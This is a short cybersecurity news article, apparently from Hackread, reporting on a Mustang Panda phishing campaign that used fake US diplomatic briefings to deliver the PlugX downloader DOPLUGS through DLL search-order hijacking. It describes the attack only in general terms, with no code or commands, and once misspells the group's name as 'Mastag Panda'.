In a targeted operation running between late December 2025 and mid-January 2026, government officials and international diplomats were hit by a quiet but effective cyber attack. Security researchers at the firm Dream found that hackers from the China-backed Mastag Panda group (aka HoneyMyte) were masquerading as US and international bodies, using fake documents to trick high-level targets into installing surveillance tools.
A Trap Built on Credibility
The campaign, details of which were shared exclusively with Hackread.com, relied on a simple disguise rather than high-tech software vulnerabilities. Attackers sent out emails that looked like standard diplomatic mail, with subject lines about policy updates or internal briefings.
These documents were designed to look like the authoritative summaries typically shared by the United States after high-level meetings. Because these briefings are seen as dependable, officials across Asia and Eastern Europe opened them without suspicion. Trust, as we know it, is a powerful tool for hackers; researchers noted that in this case, “opening the file alone was sufficient to trigger the compromise.”
The Group Behind the Hack
Further investigation revealed that the group responsible is likely Mustang Panda, a hacking collective linked to China that has been active since 2012.
“The combination of delivery techniques, loader architecture, malware characteristics, lure theming, and overlapping infrastructure observed in this campaign aligns with publicly documented activity attributed to Mustang Panda,” Dream’s report reads.
According to Dream Research Labs, the hackers used a surveillance tool known as PlugX, specifically a version called DOPLUGS. While some malware is designed to break things, this particular tool is built for “quiet data collection.”
For your information, DOPLUGS is a “downloader” version of the software. This means its main job is to sneak onto a computer and then use PowerShell (a powerful background tool in Windows) to funnel more dangerous tools onto the device later. Researchers noted in the blog post that the attackers used custom encryption routines to keep their activities hidden from standard security checks.
Identifying the Threat
Dream’s analysis of the attack reveals that the hackers used a trick involving DLL search-order hijacking. To put it simply, this is a method where the malware tricks a safe, legitimate computer programme into loading a hidden, poisoned file instead of the real one.
The team at Dream, based in Tel Aviv, first spotted the threat in mid-January 2026 after an AI-based hunting agent flagged a strange archive. It turned out to be a coordinated effort to spy on those involved in elections and international coordination. Shalev Hulio, the Co-Founder and CEO of Dream, said this activity “undermines the trust mechanisms that underpin state-level decision making.”
As geopolitical events unfold, researchers expect these types of fake briefings to remain a high-priority threat for those in government. A key tip for staying safe is to treat any unexpected ‘summary’ or ‘briefing’ document with caution, even if it looks like it came from a trusted partner.
(Photo by Declan Sun on Unsplash)